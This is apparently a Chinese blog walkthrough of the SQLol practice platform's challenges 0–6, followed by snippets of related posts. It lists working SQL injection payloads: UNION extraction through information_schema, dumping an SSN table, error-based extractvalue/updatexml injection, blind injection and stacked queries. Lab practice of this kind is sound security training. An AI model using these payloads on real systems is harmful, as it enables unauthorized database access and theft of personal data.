SQL注入测试平台 SQLol -6.challenges挑战

  SQLol上面的挑战共有14关,接下来我们一关一关来突破。

Challenge 0

目的是让查询返回所有的用户名,而不是只有一个。

SELECT username FROM users WHERE username = 【‘1‘】 GROUP BY username ORDER BY username ASC

注入点在【1】处

构造POC:  1‘ or 1=1# 或者 1‘ and 1=2 union select username from users#

都可以查询到所有的用户名。

Challenge 1

目标是找到数据库中存在的社会安全号码表并提取信息。

SELECT username FROM users WHERE username = 【‘1‘】 GROUP BY username ORDER BY username ASC

注入点在【1】处,我们需要知道有哪些表哪些字段,才能找出所想要的信息,为此,我们使用information_schema进行查表查列。

构造POC:

查出数据库所有的库,      ‘ and 1=2 UNION SELECT table_schema FROM information_schema.tables#

选择sqlol库查表,           ‘ and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=‘sqlol‘#

选择表,查列,              ‘ and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=‘ssn‘#

选择字段,查数据,       ‘ UNION SELECT concat(name, 0x7e, ssn)  FROM ssn#

到此,已经得到所想要的信息。

Challenge 2

目标是找到数据库中存在的社会安全号码表并提取信息。

SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC

注入点在【1】处,与challenge1类似,所不同的,这是数字型注入,过滤单引号。

构造POC:

查出数据库所有的库,1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#

选择sqlol库查表,     1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=0x73716C6F6C#(0x73716C6F6C是sqlol的Hex编码)

选择表,查列,         1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#(0x73736E是ssn的Hex编码)

选择字段,查数据,  1 and 1=2 UNION SELECT concat(name, 0x7e, ssn)  FROM ssn#

到此,已经得到所想要的信息。

Challenge 3

目标是找到数据库中存在的社会安全号码表并提取信息。

无提示,只输出一行,详细错误信息,查询不显示,与challenge 1类似。

构造POC:

‘ UNION SELECT concat(name,‘:‘,ssn) FROM ssn LIMIT 0,1

Challenge 4

目的是找出数据库中存在的社会安全号码表,并提取其信息,无盲SQL注入技术。

提示,有详细的错误,可以使用报错注入

构造POC:

‘ and extractvalue(1, concat(0x5c,(select user())))#

‘ AND ExtractValue(1,concat(0x01,(select concat(name,‘:‘,ssn) from ssn limit 0,1)))#

Challenge 5

目标是找到数据库中存在的社会安全号码表并提取信息。

提示,使用盲注,无输入错误信息

构造POC:

得到数据库的长度: 1‘ or  length(database())=5#

逐字猜解ascii码: 1‘ or  ascii(mid(database(),1,1))=115#

慢慢猜,总会猜出来的,大致方法就这个。

Challenge 6

目标是创建一个新表称为“ipwntyourdb”使用堆叠的查询。

构造POC:

SELECT username FROM users WHERE username = ‘Herp Derper‘;create table ipwntyourdb( id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC

 

时间: 2024-08-01 10:43:58

SQL注入测试平台 SQLol -6.challenges挑战的相关文章

SQL注入测试平台 SQLol -1. 简介与安装

最近下载了SQLol测试了一下,感觉挺好玩的,做一下记录. SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目. SQLol is now part of the Magical Code Injection Rainbow framework at http://github.com/SpiderLabs/MCIR and the standalone version will no longer be m

SQL注入测试平台 SQLol -2.SELECT注入测试

前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试. slect模块,有输入处理和输出处理,可以配置不同的sql注入情况,这里先以最简单的,不做任何输入处理的情况进行测试,慢慢进行深入,sql配置如下图: 1.输入测试语句 2.显示完整sql语句,方便构造 3.选择注射位置(分别8中不同的注射位置,下面我们以注射位置进行分类测试) 一.WHERE 子句里的字符

SQL注入测试平台 SQLol -3.INSERT注入测试

访问首页的insert模块,http://127.0.0.1/sql/insert.php,开始对insert模块进行测试. insert语句: INSERT INTO [users] ([username], isadmin) VALUES (['1'], [0]) 接收的参数可能拼接到上述语句中[]的任一个位置. 在这里我们一般使用 1.报错注入 2.盲注(布尔类型.时间延迟类型) 有的注入点可以同时使用多种方法注入,这里只演示一种. 下面演示注入到不同位置的方法. 一.Value(stri

SQL注入测试平台 SQLol -5.DELETE注入测试

访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试. delete语法: DELETE FROM [users] WHERE [username] = ['1'] 几个位置都可能存在注入,这里只演示一种. 下面演示注入到不同位置的方法. 一.String in WHERE clause 构造POC: ' or updatexml(1,concat(0x7e,(database()),0x7e),0) or ' 获取数据库 二

java web sql注入测试(3)---现象分析

那为什么出现以上问题呢?这是程序代码层控制不当导致的.如果web前端对输入数据控制严格,会对数据库进行操作的字符串,在客户端做敏感字符转义处理,或者在操作数据库的dao层,使用动态参数的sql,不使用拼接方式的sql,都可以防止该类问题的发生. 一般情况,如果测试人员了解dao层的具体设计,如果使用的就是非拼接方式的,基本是可以拦截大部分这些存在问题的sql了.而如果使用的是拼接方式,就可以好好的设计测试用例,进行测试了. 那又为什么非拼接方式就可以有效的防止SQL注入测试呢? 修改上部分核心代

如何防范SQL注入——测试篇(转)

在上一篇文章<如何防范SQL注入-编程篇>中,我们讲了对于程序员而言,如何编码以防范代码存在SQL注入漏洞,那么,对于测试人员来说,如何测试SQL注入漏洞是否存在呢? 首先,我们将SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上: Out-of-band:数据通过不同于SQL代码注入的方式获得(譬如通过邮件等) 推理:这种攻击是说并没有真正的数据传输,但攻击者可以通过发送特定的请求

通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解

0x1:工具和环境介绍 dvwa:渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置. 0x2:步骤说明 配置Burp Suite和浏览器. 这一步比较简单,主要是用来抓取用来sql注入的信息. 在Burp中设置proxy代理:127.0.0.1:8080,配置浏览器使用代理,这样浏览器的request信息就可以被Burp抓取了. 抓取登录信息 在Burp的Proxy界面可以抓取到浏览器访问的信息,如

sql注入攻击与防御第二版读书笔记二——SQL注入测试

寻找SQL注入 该阶段的主要目标是识别服务器响应中的异常并确定是否由SQL注入漏洞产生,随后确定在服务器端运行的SQL查询的类型(select,update,insert或delete),以及将攻击代码注入查询中的位置(比如from,where或者order by等) 我们需要关注:get,post,cookie,host,referer,useragent. 理解并利用SQL注入漏洞所涉及的主要技术包括:在心里重建开发人员在Web应用中编写的代码以及设想远程SQL代码的内容.如果能想象出服务器

【jSQL-injection】Java自动化SQL注入测试工具—jSQL Injection v0.81

jsql-injection是Kali集成的一款使用java开发的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加管理页面暴力扫描.敏感文件猜测.Web shell.SQL shell.上传等功能,扩展形成一个综合性的Web渗透测试工具.目前提供的版本是v0.81,github项目地址: https://github.com/ron190/jsql-injection,与sqlmap相比,其拥有图形化的界面和完整的中文支持. 从github上下载源码的压缩包,来编译它,首先向myecl